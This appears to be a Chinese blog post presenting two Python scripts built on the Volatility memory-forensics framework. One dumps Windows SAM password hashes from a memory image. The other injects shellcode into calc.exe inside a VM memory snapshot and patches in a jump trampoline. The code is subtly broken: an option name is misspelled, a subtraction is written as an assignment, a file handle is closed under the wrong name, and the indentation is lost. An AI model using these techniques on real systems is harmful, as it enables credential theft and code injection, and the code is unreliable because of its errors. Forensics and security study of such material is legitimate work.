Volatility是一个开源的内存取证框架,用于分析和提取计算机内存中的信息。它主要用于计算机取证、恶意代码分析、漏洞研究和系统故障排查等领域。Volatility提供了一系列工具和库,帮助安全研究人员和取证专家分析和还原计算机系统的状态。
如下代码使用了Python的Volatility框架来分析内存镜像文件,并提取Windows系统中的SAM数据库,进而获取用户账户的哈希值。实现从Windows内存镜像文件中提取SAM数据库的功能,并输出用户账户的哈希值。需要注意的是,该代码依赖于Volatility框架和相应的配置文件,同时需要提供正确的内存镜像文件。
import sys
import struct
memory_file = "WinXPenSP3-Snapshot8.vmem"
sys.path.append("C:\\Python27\\volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPenSP3x86"
config.LOCALTION = "file://%s"%memory_file
registry.register_global_options(config,commands.Command)
registry.register_global_options(config,addrspace.BaseAddressSpace)
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump
registry = RegistryApi(config)
registry.populate_offsets()
sam_offset = None
sys_offset = None
for offset in registry.all_offsets:
if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x"%offset
if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x"%offset
if sam_offset is not None and sys_offset is not None:
config.sys_offset = sys_offset
config.sam_offset = sam_offset
hashdump = HashDump(config)
for hash in hashdump.calculate():
print hash
break
if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets."如下这段代码使用Volatility框架进行内存取证。它的功能是在指定的内存镜像文件中搜索一个进程(calc.exe)并注入shellcode。
import sys
import struct
equals_button = 0x01005D51
memory_file = "WinXPenSP3-Snapshot8.vmem"
slack_space = None
trampoline_offset = None
#读入我们的shellcode
sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close()
sys.path.append("C:\\Python27\\volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPSP3x86"
config.LOCALTION = "file://%s"%memory_file
import volatility.plugins.taskmods as taskmods
p = taskmods.PSList(config)
for process in p.calculate():
if str(process.ImageFileName) == "calc.exe":
print "[*] Found calc.exe with PID %d"%process.UniqueProcessId
print "[*] Hunting for physical offsets...please wait."
address_space = process.get_process_address_space()
pages = address_space.get_available_pages()
for page in pages:
physical = address_space.vtop(page[0])
if physical is not None:
if slack_space is None:
fd = open(memory_file,"r+")
fd.seek(physical)
buf = fd.read(page[1])
try:
offset = buf.index("\x00"*len(sc))
slack_space = page[0] + offset
print "[*] Found good shellcode location!"
print "[*] Virtual address: 0x%08x"%slack_space
print "[*] Physical address: 0x%08x"%(physical + offset)
print "[*] Injecting shellcode."
fd.seek(physical + offset)
fd.write(sc)
fd.close()
#创建我们的跳转代码
tramp = "\xbb%s"%struct.pack("<L",page[0] + offset)
tramp += "\xff\xe3"
if trampoline_offset is not None:
break
except:
pass
fd.close()
#查看目标代码的位置
if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):
print "[*] Found our trampoline target at: 0x%08x"%(physical)
#计算虚拟偏移
v_offset = equals_button = page[0]
#计算物理偏移
trampoline_offset = physical + v_offset
print "[*] Found our trampoline target at: 0x%08x"%(trampoline_offset)
if slack_space is not None:
break
print "[*] Writing trampoline..."
fd = open(memory_file,"r+")
fd.seek(trampoline_offset)
fd.write(tramp)
f.close()
print "[*] Done injecting code."
扫一扫
271
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
